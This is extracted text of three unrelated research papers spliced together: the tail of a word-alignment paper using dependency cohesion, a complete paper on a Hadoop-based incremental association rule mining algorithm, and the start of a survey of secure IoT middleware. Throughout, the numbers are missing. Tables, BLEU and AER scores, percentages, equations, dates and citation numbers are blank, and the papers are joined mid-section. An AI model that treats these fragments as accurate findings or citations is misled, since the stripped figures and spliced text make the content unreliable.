models. wu ( ) proposed the inversion transduction grammar (itg) to model word alignment as synchronous parsing for a sentence pair. yamada and knight ( ) represented translation as a sequence of re-ordering operations over child nodes of a syntactic tree. gildea ( ) introduced a “loosely” tree-based alignment technique, which allows alignments to violate syntactic constraints by incurring a cost in probability. pauls et al. ( ) gave a new instance of the itg formalism, in which one side of the synchronous derivation is constrained by the syntactic tree. fox ( ) measured syntactic cohesion in gold standard alignments and showed syntactic cohesion is generally maintained between english and french. she also compared three variant syntactic representations (phrase tree, verb phrase flattening tree and dependency tree), and found the dependency tree produced the highest degree of cohesion. so cherry and lin ( ; a) used dependency cohesion as a hard constraint to restrict the alignment space, where all potential alignments violating cohesion constraint are ruled forward reverse hcp mcp hcp mcp ibm . . . . ibm -l . . . . ibm -prior . . . . agree-hmm . . . . tree-distance . . . . hard-cohesion . . . . soft-cohesion-em . . . . soft-cohesion-gibbs . . . . gold-standard . . . . table : hcps and mcps on the development set. fbis large ibm . . ibm -l . . ibm -prior . . agree-hmm . . tree-distance . n/a hard-cohesion . . soft-cohesion-em . . soft-cohesion-gibbs . * . * table : bleu scores, where * indicates significantly better than ibm (p< . ). forward reverse gdfa ibm . . . ibm -l . . . ibm -prior . . . agree-hmm . . . hard-cohesion . . . soft-cohesion-em . . . soft-cohesion-gibbs . . . table : aers on the testing set (trained on the large data set). out directly. although the alignment quality is improved, they ignored situations where a small set of correct alignments can violate cohesion. to address this limitation, cherry and lin ( b) proposed a soft constraint approach, which took dependency cohesion as a feature of a discriminative model, and verified that the soft constraint works better than the hard constraint. however, the training procedure is very time- consuming, and they trained the model with only hand-annotated sentence pairs. therefore, their method is not suitable for large-scale tasks. in this paper, we also use dependency cohesion as a soft constraint. but, unlike cherry and lin ( b), we integrate the soft dependency cohesion constraint into a generative model that is more suitable for large-scale word alignment tasks. conclusion and future work we described a generative model for word alignment that uses dependency cohesion as a soft constraint. we proposed an approximate em algorithm and an explicit gibbs sampling algorithm for parameter estimation in an unsupervised manner. experimental results performed on a large-scale data set show that our model improves word alignment quality as well as machine translation quality. our experimental results also indicate that the soft constraint approach is much better than the hard constraint approach. it is possible that our word alignment model can be improved further. first, we generated word alignments in both forward and reverse directions separately, but it might be helpful to use dependency trees of the two sides simultaneously. second, we only used the one-best automatically generated dependency trees in the model. however, errors are inevitable in those trees, so we will investigate how to use n-best dependency trees or dependency forests (hayashi et al., ) to see if they can improve our model. acknowledgments we would like to thank nianwen xue for insightful discussions on writing this article. we are grateful to anonymous reviewers for many helpful suggestions that helped improve the final version of this article. the research work has been funded by the hi-tech research and development program (" " program) of china under grant no. aa a , aa , and aa and also supported by the key project of knowledge innovation program of chinese academy of sciences under grant no.kgzd-ew- . this work is also supported in part by the dapra via contract hr - -c- entitled "linguistic resources for multilingual processing". references mohit bansal, chris quirk, and robert moore, . gappy phrasal alignment by agreement. in proc. of acl . peter f. brown, stephen a. della pietra, vincent j. della pietra and robert l. mercer, . the mathematics of statistical machine translation: parameter estimation. computational linguistics, ( ). pages - . c. cherry and d. lin, . a probability model to improve word alignment. in proc. of acl ' , pages - . c. cherry and d. lin, a. a comparison of syntactically motivated word alignment spaces. in proc. of eacl ' , pages - . c. cherry and d. lin, b. soft syntactic constraints for word alignment through discriminative training. in proc. of coling/acl ' , pages - . john denero and dan klein, . tailoring word alignments to syntactic machine translation. in proc. of acl ' , pages . c. dyer, j. clark, a. lavie and n.a. smith, . unsupervised word alignment with arbitrary features. in proc. of acl ' , pages - . heidi j. fox, . phrasal cohesion and statistical machine translation. in proc. of emnlp ' , pages - . michel galley, mark hopkins, kevin knight, daniel marcu, . what's in a translation rule? in proc. of naacl ' , pages - . j. gao and m. johnson, . a comparison of bayesian estimators for unsupervised hidden markov model pos taggers. in proc. of emnlp ' , pages - . daniel gildea, . loosely tree-based alignment for machine translation. in proc. of acl' , pages - . k. hayashi, t. watanabe, m. asahara and y. matsumoto, . third-order variational reranking on packed-shared dependency forests. in proc. of emnlp ' . m. johnson, t. griffiths and s. goldwater, . bayesian inference for pcfgs via markov chain monte carlo. in proc. of naacl ' , pages - . philipp koehn, . statistical significance tests for machine translation evaluation. in proc. of emnlp' . p. koehn, h. hoang, a. birch, c. callison-burch, m. federico, n. bertoldi, b. cowan, w. shen, c. moran and r. zens, . moses: open source toolkit for statistical machine translation. in proc. of acl ' , demonstration session, pages - . percy liang, ben taskar and dan klein, . alignment by agreement. in proc. of hlt-naacl , pages - . d. lin and c. cherry, . word alignment with cohesion constraint. in proc. of naacl ' , pages - . adam lopez and philip resnik, . improved hmm alignment models for languages with scarce resources. in acl workshop on building and using parallel texts ' , pages - . cos ķun mermer and murat saraçlar, . bayesian word alignment for statistical machine translation. in proc. of acl ' , pages - . r.c. moore, . a discriminative framework for bilingual word alignment. in proc. of emnlp ' , pages - . f.j. och, c. tillmann and h. ney, . improved alignment models for statistical machine translation. in proc. of emnlp/wvlc ' , pages - . franz josef och and hermann ney, . a systematic comparison of various statistical alignment models. computational linguistics, ( ). pages - . k. papineni, s. roukos, t. ward and w.j. zhu, . bleu: a method for automatic evaluation of machine translation. in proc. of acl ' , pages - . adam pauls, dan klein, david chiang and kevin knight, . unsupervised syntactic alignment with inversion transduction grammars. in proc. of naacl ' . slav petrov, leon barrett, romain thibaux and dan klein, . learning accurate, compact, and interpretable tree annotation. in proc. of acl . jason riesa and daniel marcu, . hierarchical search for word alignment. in proc. of acl ' , pages - . jason riesa, ann irvine and daniel marcu, . feature-rich language-independent syntax-based alignment for statistical machine translation. in proc. of emnlp ' . darcey riley and daniel gildea, . improving the ibm alignment models using variational bayes. in proc. of acl ' . m. saers, j. nivre and d. wu, . word alignment with stochastic bracketing linear inversion transduction grammar. in proc. of naacl ' , pages - . a. stolcke, . srilm-an extensible language modeling toolkit. in icslp ' . b. taskar, s. lacoste-julien and d. klein, . a discriminative matching approach to word alignment. in proc. of emnlp ' , pages - . ashish vaswani, liang huang, and david chiang, . smaller alignment models for better translations: unsupervised word alignment with the l norm. in proc. acl' , pages – . stephan vogel, hermann ney and christoph tillmann, . hmm-based word alignment in statistical translation. in proc. of coling- , pages - . d. wu, . stochastic inversion transduction grammars and bilingual parsing of parallel corpora. computational linguistics, ( ). pages - . zhiguo wang, chengqing zong, . phrase structure parsing with dependency structure, in proc. of coling , pages - . zhiguo wang, chengqing zong, . parse reranking based on higher-order lexical dependencies, in proc. of ijcnlp , pages - . kenji yamada and kevin knight, . a syntax-based statistical translation model. in proc. of acl ' , pages - . ying zhang, stephan vogel, and alex waibel. . interpreting bleu/nist scores: how much improvement do we need to have a better system? in proc. of lrec. shaojun zhao and daniel gildea, . a fast fertility hidden markov model for word alignment using mcmc. in proc. of emnlp ' , pages - . international journal of advanced network, monitoring and controls volume , no. , incremental association rule mining algorithm based on hadoop zhu ying school of computer science and engineering xi’an technological university xi’ an, , china e-mail: @qq.com wang jianguo school of computer science and engineering xi’an technological university xi’ an, , china e-mail: wjg_xit@ .com abstract—aiming at the problems of low efficiency, low cost of time and space, this paper proposes an incremental association rule mining algorithm based on hadoop load balancing. in combination with the tree structure, when the data in the database is constantly updated, it does not need to scan the original database to generate frequent item sets, and use the load balancing in the data distribution so that the master node distributes the data to the child nodes evenly. in the experiment of control variable method, the variables of minimum support and sample increment are processed respectively. the experimental results show that when the minimum support is unchanged and the transaction data set is increased, the incremental association rule mining algorithm based on hadoop load balancing takes less than . % of the apriori algorithm. the number of association rules mined by the algorithm is more than that of the apriori algorithm. and the memory usage of the hadoop-based incremental association rule mining algorithm is much smaller than the apriori algorithm; when the total amount of transaction data is constant and the minimum support is changed, the memory usage of the hadoop-based incremental association rule mining algorithm is smaller than the apriori algorithm. the hadoop-based incremental association rule mining algorithm has some improvements in memory usage and efficiency. keywords—hadoop; tree structure; load balancing; frequent item sets; association rules i. introduction in today's era of big data, data is an important asset of information society, while data processing and management are also facing great challenges, such as data large amount of information, difficult to handle, difficult to obtain value. data mining [ ] is a deep data intelligence analysis method. the method involves knowledge of many related fields such as machine learning, deep learning, artificial intelligence, and information retrieval. it is mainly used to extract potential information data from a massive data set that can contribute to the value of business decisions.association rule mining technology [ ] is a very important part of data mining technology. under the big data environment, it can find many valuable information from the huge and irregular data by discovering the relationship among the items in the data set. research on association rule algorithm in big datatechnology environment is a very important and challenging research topic. considering that the data in the database is constantly updated, the incremental association rule updating techniques have been proposed to effectively maintain the association rules of updated data. literatures[ - ] proposed incremental association rule update technology, it is a highly efficient maintenance of data updating association rules, the literature describes in detail the characteristics of the technology. in the literature [ ], the frequent item sets mining algorithm of association rules is proposed, which is an important component of association rule analysis, data statistics, causality and other mining tasks. the idea of parallel implementation of algorithm is proposed in the literature [ ]. data is distributed by the master node to each node to reduce the load pressure. in the literature [ ], the fup algorithm needs to scan the original database several times to solve the frequent item sets. of the data environment, the mining efficiency is low. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , in the literature [ - ] , the paper introduces the characteristics and structure of the b+ tree, also mentioned the one-dimensional data index structure in the database. when dealing with large amounts of data, processing efficiency can be compromised due to high server load.therefore, this paper presents proposes an incremental association rule mining algorithm based on hadoop load balancing. the implementation of this algorithm uses the map/ reduce programming model to parallelize the mining tasks, and uses load balancing to mine frequent item sets in the clusters to get the association rules. ii. fup algorithm (fast update parallel) table i. symbolic description symbol means db raw data set db new data set dbudb all data sets frequent item sets(k-order) candidate set(k-order) when calculating the frequent item sets, the fup algorithm [ ] makes use of the known support of the old frequent item sets, and then through the frequent analysis of the candidate item sets in db and db, many candidates can be filtered out in the process of determining frequent item sets. therefore, it is more efficient than re-running the apriori algorithm, especially if the old and new frequent sets are not much different. however, like the apriori algorithm, the fup algorithm must spend a lot of time processing a large set of candidate items and it is necessary to repeatedly scan the database db and db to pattern match the candidate sets. since the fup algorithm uses to generate , the generated candidate set of db is large, and many of them are infrequent, and some even are impossible to appear in db, which affects the efficiency of the algorithm. in addition, the fup algorithm needs to perform k+ layer scanning on the entire database dbudb. in general, the original database db is very large, so the k+ layer scanning for the db is not efficient. the shortcomings of the current incremental update association mining algorithm: ) when the database is updated, the generation of frequent item sets will repeatedly scan the processed data sets, so that the mining efficiency is not high; ) generating a large number of candidate sets; ) with the addition of the database, the minimum support threshold and the minimum confidence threshold do not change, which will affect the mining of strong association rules; iii. fup algorithm improvement due to the inefficiency of fup algorithm in dealing with big data mining, this paper proposes an improved algorithm of fup, incremental association rule mining algorithm based on hadoop load balancing. combined with the hadoop distributed platform and the use of a tree structure to store information, it is only necessary to scan the db and dbone time, which can effectively improve the scanning efficiency. when the database is updated, the newton interpolation formula is used to estimate the support threshold to efficiently process the association rules. a. vertical data representation [ ] a traditional database can be represented by a two-dimensional matrix. each column of a two-dimensional matrix can be treated as a project, and each row can be treated as a transaction of the database. in the traditional apriori algorithm, horizontal data is used to represent a transaction. the typical method of implementing two-dimensional matrix is horizontal data. most data mining algorithms use database access to calculate their support. in relational databases, the size of the data in the transaction database is relatively large, and there is a problem with the size of the computer memory at present, and there will be bottlenecks. this will lead to a contradiction: due to the continuous increase of data in the database. the size of the data will be larger and larger, but the memory and hard disk international journal of advanced network, monitoring and controls volume , no. , of the computer are limited. therefore, when the data in the database reaches a certain scale, the computer memory and the hard disk will not be stored enough. therefore, a new type of data representation is generated—vertical data representation. vertical data means that each record in the database consists of a list of all the transaction records that it has appeared, as shown in tab. : table ii. horizontal database tid item citrus fruit, yogurt, butter, ham tropical fruit,yogurt, coffee whole milk,citrus fruit,newspapers tropical fruit, yogurt, cream cheese , whole milk coffee, butter, yogurt, sauces, ham butter, ham, cream cheese, sauces, newspapers table iii. vertical database item tid butter citrus fruit coffee cream cheese ham newspapers sauces tropical fruit whole milk yogurt , , , , , , , , , , , , , , b. tree structure stores data information the b+ tree [ ] is a tree data structure, which is an n-fork sort tree. it is a variant tree of b-trees required by the file system. it features: ) there are n keywords in the node of n sub-trees. each keyword does not save data, only used for indexing, and all data is stored in leaf nodes. ) all leaf nodes contain information about all keywords, and pointers to records containing these keywords, and the leaf nodes themselves are linked in order from the smallest to the largest. ) all non-terminal nodes can be thought of as index parts, which contain only the largest (or smallest) keyword in their sub-tree (root node). as shown in fig. , it is a b+ tree of m= (consisting of information in tab. ). butter sauces p p butter cream cheese p p sauces whole milk p p butter cream cheese coffee cream cheese ham newspapers sauces tropical fruit whole milk yogurt figure . order three of the b+ tree c. hadoop distributed platform in this era of increasing data size, the traditional frequent item set mining algorithm has been difficult to support the mining of its massive transaction database. even if it can be mined, it will lead to a particularly long mining time, or it may be due to the huge amount of data. causes the program to fail. the solution to the problem of the traditional frequent item set mining algorithm is to add the hadoop distributed platform to the frequent item set mining algorithm, which not only makes the traditional frequent item set mining algorithm run more efficiently, but also reduces the storage pressure of the database. international journal of advanced network, monitoring and controls volume , no. , transaction database d data block data block data block find local frequent item sets find local frequent item sets find local frequent item sets form a global candidate set find global frequent item sets in the candidate set get frequent item sets map阶段 map阶段 reduce阶段 reduce阶段 figure . frequent item set generation step diagram d. hbpt-fup algorithm based on the original algorithm, there are some disadvantages of generating a large number of candidate sets and repeated retrieval processing of the original database. combined with the characteristics of b+ tree, the data information is stored. based on fup algorithm, the incremental association rule mining algorithm under hadoop platform is proposed: hbpt- fup algorithm(incremental association rule mining algorithm based on hadoop load balancing,improved algorithm of fup algorithm). ) basic ideas ① statistics in the database transaction items, get transaction items set. ② setup process load estimation, through the map process using load balancing grouping way to read the transaction items, distributed to different reduce nodes. the reduce process is based on how the b+ tree is created and stores transaction item information. the bottommost leaf node of b+ tree contains all the item sets. the frequent item sets are obtained by comparing the number of items with the minimum support, and other infrequent item sets remain in their leaf nodes to ensure that future data updating become frequent nodes. the local frequent item sets are obtained by the b+ tree created by the reduce nodes, and the local frequent item sets are merged into the global frequent item sets to get the association rules. compared with the previous incremental updating correlation mining algorithm, the algorithm has the characteristics of load balancing. when dealing with large amounts of data, due to a single server load is too high affect the processing speed, so need to use server clusters to deal with. the load factor is added to the estimation of the load, which can calculate the load of each frequent item more accurately. the algorithm takes advantage of the b+ balanced tree properties. the leaf nodes at the bottom of the tree contain all the keywords of the whole tree, and they are linked together like a doubly linked list. ) estimated load the load in the parallelization process is equal to the sum of the load on each node [ ]. supposed that the load corresponding to the data item is i l , the position in the frequent item set is ip , the load influence factor is i a (the frequency of the data item): ( ) ) equalization of data frequent items in frequent item sets are divided into q groups according to the balanced grouping strategy, which makes the data balance in the distribution process so as to improve the parallelization of the mining process. if q is less than the length of frequent itemsets, the q items of frequent itemsets are assigned to each group in turn. the group's load is initialized by the sum of the frequent item loads in each group. and then repeat the following two steps until all the frequent items are assigned: ① to assign unallocated frequent items to the group with the lowest load; ② the load in each group is added up. if q is greater than the length of frequent itemsets, the first x of the frequent itemsets is assigned to the x group, which initializes the group load according to the load of the frequent items it contains, and then repeats the above two steps until all frequent items are assigned. international journal of advanced network, monitoring and controls volume , no. , ) threshold setting the minimum support threshold will change with the user's needs and the database update. when the threshold is set too low, the more rules are mined, but the rule is less useful. conversely, when the threshold is set too high, there are very few rules for mining, which will lose some useful rules. therefore, it is very important to set the appropriate threshold when dealing with incremental databases. definition : the support degree of item set is one of the most important metrics in association rule mining. it represents the probability that the item set will appear in the total item set. the formula is: ( ) where is the total transaction sets.num() represents the number of occurrences of a particular item set in a transaction set. definition : confidence indicates the probability that y is derived by the association rule in the event that the prerequisite x occurs. that is, in the item set containing x, there is a possibility of y. the formula is: ( ) the newton interpolation formula [ ] that can be used to derive the support threshold from the above formula is: ( ) where c is the confidence level, n is the number of rules, and m is the total number of attributes in the transaction set. when the association rule is first mined, the setting of the minimum support threshold is a trial and error process. when the transaction database is updated, it is possible that the previously set threshold is no longer applicable, so an adjustment threshold is required. in order to improve the accuracy of the estimation, the order of the newton interpolation polynomial can be improved as the number of executions of the algorithm increases. because the algorithm generates a parameter pair each time it runs. if this node is farther from the nearest two nearest interpolation nodes in the interpolation formula, you can add this node as a new interpolation node and adjust the interpolation formula. the accuracy of the adjustment of the adjusted interpolation formula at point is greatly improved. newton interpolation formula automatically determines the specific implementation process of support threshold, as follows: statistics are performed on some data in the experimental transaction data set (shopping data record), and the support degree and confidence corresponding to the rule are calculated, as shown in tab. (support, confidence in parentheses): table iv. rule support and confidence calculation results ham bread coffee butter ( . , . ) ( . , . ) ( . , . ) yogurt ( . , . ) ( . , . ) ( . , . ) cheese ( . , . ) ( . , . ) ( . , . ) a) for the data in tab. , set the reliability threshold to . , the support threshold to . , and run frequent pattern mining. the association rules available according to tab. are: butter->ham,yogurt->ham,yogurt->bread, cheese->ham,cheese->bread, cheese->coffee. b) set the reliability threshold to . and the support threshold to . . run frequent pattern mining. the association rules available according to tab. are: butter->ham, yogurt->bread, cheese->ham. c) set the reliability threshold to . and the support threshold to . . run frequent pattern mining. the association rules available according to tab. are: yogurt->bread. the newton interpolation formula for the known support threshold is . then can get the rd cd international journal of advanced network, monitoring and controls volume , no. , following three expressions: so you can get three interpolation nodes as:( . , . ),( . , . ),( . , . ). according to these three interpolation nodes, the difference quotient is shown in tab. : table v. difference quotient table number of rules ( ) first order difference quotient second order difference quotient . . . . - . . . - . . from tab. , a second-order newton interpolation polynomial can be written: ( ) at this time, the support threshold can be estimated according to the newton interpolation formula and the number of association rules expected by the user. a) determining the association rules that the user desires to mine (when the database update is about to be performed next time, the number of expected association rules is set to the average value of the total number of association rules of the previous mining); b) calculate the value of x according to the formula ; c) substituting the value of x into to calculate the estimated value of support sup. assuming that the user expects to mine three association rules, the calculated x value is: ( ) then the x value is substituted into to get the support: . sup can be chosen to be a value close to . . for example, take sup= . as the support threshold to perform the mining algorithm. e. algorithm implementation ) brief description of the algorithm steps using the tree structure to store information, a hadoop-based incremental association rule mining algorithm hbpt-fup is proposed. the algorithm is described as follows: step : traversing the transaction database, processing according to the vertical data representation to get the item set. in the setup phase: initialize the number of packets q, distribute the transaction items of the primary node to the q child nodes. a vertical data set is created in each node, and the vertical data set is traversed to obtain an item set inserted into the b+ tree. step : in each child node, all the frequent item sets of the group are obtained according to the generated b+ tree. step : when the transaction database updates the record, follow the first step to balance all incremental load to each node. the main focus is on the update algorithm of the b+ tree. add a keyword to the leaf node at the bottom of the b+ tree. if the number of keywords contained in the node does not exceed m, the insertion is successful. otherwise, the node needs to be split. the number of keywords included in the two new nodes after splitting should not be less than (m/ + ). if the parent node of the node has enough space (m/ ~ m- ), the parent node should contain the smallest keyword in the right node. otherwise, the parent node is international journal of advanced network, monitoring and controls volume , no. , split and a new keyword is added to the parent of the parent node, followed by a higher order until the new root node is generated ( ~ m- ). step : association rules generated after database update. ) algorithm flowchart begin scan the transaction database to get the transaction item set distribute to different reduce nodes according to map. constructing an inverted index tree statistics get the global candidate set and its frequency is the frequency greater than the minimum support? output frequent item sets combine different frequent items to calculate their confidence is it greater than the minimum confidence? output association rule whether the database is updated? end yes no yes delete yes no no figure . hbpt-fup algorithm step diagram iv. experimentresults and analysis in this experiment, the file retail (association rule study classic data set) downloaded from the uci database was used as the experimental transaction data set, and the hbpt-fup algorithm was compared with the apriori algorithm. use java language to simulate on win , dual-core . ghz cpu, gb memory pc. ) analysis of the time complexity of the algorithm when the data is updated, ○ only scans and updates part of the data in the database;○ scans the tree structure once and inserts the new item set. the analysis shows that when the minimum support is constant, the execution time of the algorithm is related to the amount of data updated each time. a small number of experimental samples are extracted from the dataset, and the minimum support degree of the apriori algorithm is controlled (min_sup= . ), and the amount of updated data is sequentially increased. the experimental time of the apriori algorithm and the hbpt-fup algorithm on a pc is recorded figure shows: figure . apriori and hbpt-fup algorithms time comparison as shown in figure , when the minimum support is constant, the execution time of the apriori algorithm grows faster than the hbpt-fup algorithm when the data set increases. when the data set is the same, the apriori algorithm takes longer than the hbpt- fup. ) comparison of the number of association rules mined. when the database is updated, the minimum support threshold of the apriori algorithm does not change ( . ), and the use of the newton interpolation polynomial in the hbpt-fup algorithm predicts the next minimum support threshold, which in turn makes the mined rules more efficient. in experiment , the number of association rules mined each time is counted separately. the number comparison is shown in figure : e xe cu ti o n t im e / s number of transaction items apriori hbpt-fup international journal of advanced network, monitoring and controls volume , no. , figure . comparison of the number of association rules as shown in figure , when the amount of update data increases, the minimum support remains unchanged, and the number of association rules mined by the apriori algorithm is less than that extracted by the hbpt-fup algorithm. after adjusting the minimum support, the hbpt-fup algorithm mines some rules that are easily missed, which increases the validity of the rules. ) analyze the spatial complexity of the algorithm ○ in the b+ tree, only the item set and its frequency are stored, so the size of the occupied memory space is related to the total number of items; ○ storing the frequent item sets determined by the minimum support, therefore, the memory space is related to the minimum support. a) study the impact of the number of transaction item sets on memory usage. a small number of experimental samples are extracted from the data set, and the minimum support degree of the apriori algorithm and the hbpt-fup algorithm is controlled (min_sup= . ), and the amount of updated data is sequentially increased. the apriori algorithm and the memory usage of the hbpt-fup algorithm on one of the pcs are recorded separately, as shown in figure . (set the minimum support threshold of the hbpt-fup algorithm to remain the same) figure . memory usage comparison as shown in figure , when the minimum support is unchanged and the number of transaction items increases, the number of items generated increases, and the memory space occupied is larger. the apriori algorithm updates the candidate set with the change of the number of transaction items. the memory space stores the candidate set and the frequent item set. the hbpt-fup algorithm is based on distributed, and only stores data and its frequency in the tree structure of each node. therefore, the apriori algorithm takes up more memory space than the hbpt-fup algorithm. b) study the impact of minimum support on memory usage. when the minimum support of the apriori algorithm changes from . to . , the data samples ( ) and increments ( ) remain unchanged, and the memory usage when running the apriori algorithm and the hbpt-fup algorithm on a pc is recorded separately. figure shows. (the minimum support threshold for the hbpt-fup algorithm is automatically estimated based on the newton interpolation polynomial when the database is updated) n u m b e r o f a ss o ci a ti o n r u le s number of transaction items apriori hbpt-fup m e m o ry u sa g e /k number of transaction items apriori hbpt-fup international journal of advanced network, monitoring and controls volume , no. , figure . memory usage comparison as shown in figure , the smaller the minimum support, the more the number of items generated, the larger the memory space occupied. in the case of the change of support degree, the apriori algorithm updates the candidate set with the change of the support degree, and saves the candidate set and the frequent item set in the memory space. the hbpt-fup algorithm does not generate the candidate set during the support change process, so the apriori algorithm occupies more memory than the hbpt-fup algorithm. v. conclusion in this paper, a parallel update algorithm based on load balancing for incremental update association mining algorithm hbpt-fup is proposed.the algorithm effectively realizes that when the database is updated, the original database is not scanned, and the newly added data is inserted into the tree based on the original b+ tree to obtain a frequent item set. handle large-scale data with load balancing technology. distribute data to different pcs in the cluster. the experimental results show that when the number of transaction records is the same as the amount of new data, the time spent by the hbpt-fup algorithm is less than . % of the apriori algorithm, which improves the efficiency of mass data processing. when the minimum support changes, the memory space occupied by the hbpt-fup algorithm on the same pc is much smaller than the apriori algorithm. the algorithm has some improvements in terms of efficiency and memory usage. acknowledgment first of all, i would like to thank my tutor during the master's degree, professor wang jianguo. during my writing stage, mr. wang continued to give guidance and help, and taught me the direction of my own research. mr. wang has a wealth of professional domain knowledge and excellent data mining direction. under the kind guidance of mr. wang, my ideas have been broadened, the bottlenecks in the research process have been solved, and my ideas have been implemented more steadily. at the same time, mr. wang is serious and responsible for his work and his mastery of professional knowledge. it is worth everyone to learn and respect.secondly, i would like to thank xi'an technological university for guiding me to grow up. finally, i am very grateful to the journal for including my thesis. references [ ] mao guojun, duan lijuan, wang shi et al. the first edition of data mining principles and algorithms, beijing tsinghua university press. : - . [ ] rakesh agrawal, tomaszimieliński,arun swami. mining association rules between sets of items in large databases[j]. acm sigmod record, , ( ). [ ] feng yucai, feng jianlin. incremental updating algorithm for association rules[j] .journal of software, , ( ): . [ ] yuan changan, data mining theory and spss clementine jewel [m]. beijing: publishing house of electronics industry, . [ ] xie peng-jun. study on parallelization of frequent item sets mining algorithm based on mapreduce [d]. nanjing: nanjing university, . [ ] shi liang, qian xue-zhong. study and implementation of parallel fp-growth algorithmbased on hadoop [j]. microelectronics and computer, , ( ): . [ ] incremental maintenance of discovered association rules and approximate dependencies[j]. alain pérez-alonso, ignacio j. blanco medina, luisa m. gonzález-gonzález, josé m. serrano chica. intelligent data analysis. ( ): . [ ] jes_us r, campa~na, juan m,et,al.indexing fuzzy numerical data with a b+ tree for fast retrieval using necessity-measured flexible conditions[j].world scientic, , ( ): . [ ] hu yanbo,zhong jun. based on clustering b + tree database index optimization algorithm [j]. computer applications, , ( ): . [ ] david w.cheung, jiawei han. maintenance of discovered association rules in large databases: an incremental updating technique. in proc of the twelfth international conference on data engineering, .usa: ieee, ( ): - . [ ] chen fengjuan.vertical data format mining of probabilistic data sets[j].journal of anyang teachers college, ( ): - + . [ ] wang yingqiang, shi yongsheng.application of b+ tree in database indexing[j].journal of yangtze university, , ( ): . [ ] chen xiaojiang, huang yucan, et al. numerical analysis. beijing: science and technology press. . . . . . m e m o ry u sa g e / k minimum support apriori hbpt-fup international journal of advanced network, monitoring and controls volume , no. , [ ] alan sexton,hayothielecke. reasoning about b+ trees with operational semantics and separation logic[j]. electronic notes in theoretical computer science, , . [ ] hyunyoonyun,danshimha,buhyunhwang,et al. mining association rules on significant rare data using relative support[j]. the journal of systems & software, , ( ). [ ] jia wang,hongguangli,jingwenhuang,et al. association rules mining based analysis of consequential alarm sequences in chemical processes[j]. journal of loss prevention in the process industries, , . a survey of secure middleware for the internet of things a peer-reviewed version of this preprint was published in peerj on may . view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint. fremantle p, scott p. . a survey of secure middleware for the internet of things. peerj computer science :e https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. a survey of secure middleware for the internet of things paul fremantle and philip scott university of portsmouth, portsmouth, uk abstract the rapid growth of small internet connected devices, known as the internet of things (iot), is creating a new set of challenges to create secure, private infrastructures. this paper reviews the current literature on the challenges and approaches to security and privacy in the internet of things, with a strong focus on how these aspects are handled in iot middleware. we focus on iot middleware because many systems are built from existing middleware and these inherit the underlying security properties of the middleware framework. the paper is composed of three main sections. firstly, we propose a matrix of security and privacy threats for iot. this matrix is used as the basis of a widespread literature review aimed at identifying requirements on iot platforms and middleware. secondly, we present a structured literature review of the available middleware and how security is handled in these middleware approaches. we utilise the requirements from the first phase to evaluate. finally, we draw a set of conclusions and identify further work in this area. keywords: security, privacy, internet of things, iot, middleware introduction the internet of things (iot) was originally coined as a phrase by kevin ashton in [ ], with reference to “taggable” items that used radio frequency identification devices (rfid) to become electronically identifiable and therefore amenable to interactions with the internet. with the ubiquity of cheap processors and system-on-chip based devices, the definition has expanded to include wireless and internet-attached sensors and actuators, including smart meters, home automation systems, internet- attached set-top-boxes, smartphones, connected cars, and other systems that connect the physical world to the internet either by measuring it or affecting it. there are a number of definitions of iot. for the purposes of this work, we will define it in the following way. an iot device is a system that contains either sensors or actuators or both and supports connection to the internet either directly or via some intermediary. a sensor is a subcomponent of a device that measures some part of the world, allowing the device to update internet and cloud systems with this information. a sensor may be as simple as a button (e.g. amazon dash button), but more complex sensors widely deployed include weather sensors (barometers, anemometers, thermometers), accelerometers and gps units, light sensors, air quality sensors, people-counters, as well as medical sensors (blood sugar, heart rate, etc), industrial sensors (production line monitoring, etc) and many more. actuators are electronically controlled systems that affect the physical world. these includes lights, heaters, locks, motors, pumps, relays and so forth. therefore the iot is the network of such devices together with the internet systems that are designed to interoperate and communicate with those devices, including the websites, cloud servers, gateways and so forth. the number of iot devices has grown rapidly, with a recent estimate suggesting that there were . billion internet attached devices in and a prediction of billion devices by [ ]. this brings with it multiple security challenges: • these devices are becoming more central to people’s lives, and hence the security is becoming more important. • many iot devices collect personally identifiable information (pii) which may lead to potential privacy concerns. peerj preprints | https://doi.org/ . /peerj.preprints. v | cc by . open access | rec: mar , publ: mar • because devices can affect the physical world, there are potential attacks that may have greater impact than purely virtual attacks. • these devices, due to size and power limitations, may not support the same level of security that we would expect from more traditional internet connected systems. • the sheer scale and number of predicted devices will create new challenges and require new approaches to security. because of the pervasive and personal nature of iot, privacy and security are important areas for research. in , more than , iot devices were conjoined into a hostile botnet named mirai that attacked the dns servers of the east coast of the us [ ]. the total attack bandwidth of this system was measured at more than gbps. in fact, the number of devices attacked was a small number compared to the potential: previous research [ ] has identified several million devices that are available for attack. therefore there is a strong motivation to find approaches to improve and enhance the security and privacy of the iot. many iot projects use existing platforms, also known as middleware to build upon. the oxford english dictionary [ ] defines middleware as: software that acts as a bridge between an operating system or database and applications, especially on a network. such systems can either improve security or reduce it: if the platform is built with privacy and security in mind then such systems can embed best-practices and enable system designers to rapidly create secure systems. if platforms are built without security, or security is added as an after-thought, then it is possible that not only does the platform encourage the creation of insecure, privacy-negating systems, but also that it may make it more difficult to add security when problems are found. the creation of systems with security and privacy as a key design principle is known as privacy by design (pbd) [ ]. the rest of this work is laid out as follows. in section we outline the research approach and methodology used for the survey. in section we evaluate threats for security and privacy using a matrix model. in section , we use a three-layer model to evaluate iot privacy. from these models we present a set of requirements for iot privacy and security in section . in section we outline the structured survey of iot middleware systems. in section , we identify secure middleware systems and look at the security and privacy characteristics of each, using the previously identified requirements as a guide. in section we summarise the findings of the survey. finally, in section we look at the conclusions, contributions and further work in this area. approach and methodology in order to understand the security threats against the internet of things, we need to take an approach to classifying threats. the most widely used ontology of security threats is the confidentiality integrity availability (cia) triad [ ] which has been extended over the years. the extended ontology is referred to as the “cia plus” (cia+) model [ ]. in the course of reviewing the available literature and approaches to iot security, we have created a proposed expansion of the existing framework that we believe works better in the iot space. in particular, we propose a new ontology based on a matrix of evaluation where we look at each of the classic security challenges in three different aspects: device/hardware, network, and cloud/server-side. in some cells in this matrix, we have not identified any areas where the iot space presents new challenges: in other words, whilst the domain space covered by these cells contains security challenges, those challenges are no different from existing web and internet security challenges in that domain. in those cells we can say that the challenges are “unchanged”. in other cells we specifically identify those challenges that are significantly modified by the unique nature of the internet of things. in addition to the matrix, we utilise the three layer privacy model from [ ] to explore privacy concerns in more detail. together, the matrix and three-layer model are then used to inform a set of 